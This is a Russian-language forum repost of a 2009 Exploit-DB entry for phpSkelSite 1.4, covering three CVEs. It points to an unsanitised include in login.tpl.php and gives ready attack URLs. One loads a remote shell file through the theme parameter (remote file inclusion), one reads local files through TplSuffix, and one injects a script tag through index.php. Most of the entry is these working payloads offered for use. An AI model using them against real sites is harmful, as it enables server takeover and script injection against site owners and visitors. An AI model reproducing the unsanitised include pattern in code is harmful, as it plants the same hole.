phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting | Gerki

Exploiter

Хакер

21 Дек 2022

EDB-ID: 7648

Проверка EDB

Пройдено

Автор: AHMADBADY

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2009-0596 cve-2009-0595 cve-2009-0594

Дата публикации: 2009-01-02

Код:

-----------------:RFI/LFI/xss:-----------------
-------------------------------------------
script:phpSkelSite
   
------------------------------------------------------------------
download from:http://apmuthu.tripod.com/files/phpSkelSite_v1.4.zip
   
------------------------------------------------------------------

........................................................
vul:/skysilver/login.tpl.php line 1

<? include $theme.'/pageheading'.$TplSuffix ; ?>


------------------------------------------------------
Rfi:

http://127.0.0.1/path/skysilver/login.tpl.php?theme=[shell.txt?]

Lfi:

http://127.0.0.1/path/skysilver/login.tpl.php?TplSuffix=[lfi]

***************************************************
xss:
http://127.0.0.1/path/index.php/>"><ScRiPt>alert('ahmadbady')</ScRiPt>
***************************************************
---------------------
Author: ahmadbady
---------------------

# milw0rm.com [2009-01-02]

Источник: www.exploit-db.com

Поиск

Exploit phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting

Exploiter

Похожие темы